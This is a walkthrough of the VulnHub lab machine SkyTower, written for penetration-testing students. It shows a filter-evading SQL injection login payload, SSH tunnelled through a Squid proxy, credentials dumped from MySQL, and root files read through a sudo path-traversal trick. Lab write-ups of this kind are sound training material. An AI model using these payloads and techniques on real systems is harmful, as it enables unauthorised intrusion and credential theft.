vulnhub machine SKYTOWER walkthrough

Vulnhub Machine SkyTower Walkthrough OSCP friendly/ No Metasploit

Nmap:

# Nmap 7.70 scan initiated Thu Aug  8 02:55:03 2019 as: nmap -sC -sV -p- -oN nmap 192.168.8.183

Nmap scan report for SkyTower (192.168.8.183)

Host is up (0.0019s latency).

Not shown: 65532 closed ports

PORT     STATE    SERVICE    VERSION

22/tcp   filtered ssh

80/tcp   open     http       Apache httpd 2.2.22 ((Debian))

|_http-server-header: Apache/2.2.22 (Debian)

|_http-title: Site doesn't have a title (text/html).

3128/tcp open     http-proxy Squid http proxy 3.1.20

| http-open-proxy: Potentially OPEN proxy.

|_Methods supported: GET HEAD

|_http-server-header: squid/3.1.20

|_http-title: ERROR: The requested URL could not be retrieved

MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Thu Aug  8 02:55:57 2019 -- 1 IP address (1 host up) scanned in 54.69 seconds

We have SSH filtered and a Squid HTTP proxy on port 3128, most probably the SSH is behind proxy, lets check it later. First  the WebServer.

We have login page, so lets try common creds and sqli.

On Trying sqli the server give us an error but also telling us some characters are filtered. Trying multiple characters , the string test’ || 1=1#  worked. So user test@test and password test’ || 1=1#  .

 

We got login credentials for user john, lets try to use it in ssh.

First of all we need to access ssh through proxy, there are two ways,

One is by using proxytunnel

proxytunnel -p 192.168.8.183:3128 -d 192.168.8.183:22 -a 1234

Second it by proxychains, by adding the below give in /etc/proxychains.conf

http 192.168.8.183 3128

and

proxychains ssh john@192.168.8.183

Our session got termed as soon as it was connected.

proxychains ssh john@192.168.8.183 /bin/bash

This give us a new bash shell upon connection, first thing to do

Rm .bashrc

So that condition of immediate termination is removed.

Goto /var/www and there are mysql database credentials as root:root.

We can find this out by downloading LinEnum.sh script via wget and execute it.

Login into mysql by 

Mysql -u root -proot

In Mysql

show databases;

use SkyTech;

show tables;

mysql> select * from login;

+----+---------------------+--------------+

| id | email               | password     |

+----+---------------------+--------------+

|  1 | john@skytech.com    | hereisjohn   |

|  2 | sara@skytech.com    | ihatethisjob |

|  3 | william@skytech.com | senseable    |

+----+---------------------+--------------+

3 rows in set (0.01 sec)

Lets login as sara.

proxychains ssh sara@192.168.8.183 /bin/bash

ProxyChains-3.1 (http://proxychains.sf.net)

|S-chain|-<>-192.168.8.183:3128-<><>-192.168.8.183:22-<><>-OK

sara@192.168.8.183's password:

id

uid=1001(sara) gid=1001(sara) groups=1001(sara)

We checked sara’s privileges by sudo -l

Matching Defaults entries for sara on this host:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:

    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

So we can use sudo only for /bin/cat and /accounts/*

sudo /bin/ls /accounts/../root

flag.txt

sudo /bin/cat /accounts/../root/flag.txt

Congratz, have a cold one to celebrate!

root password is theskytower

We have root credentials as root:theskytower.

 



574r570rm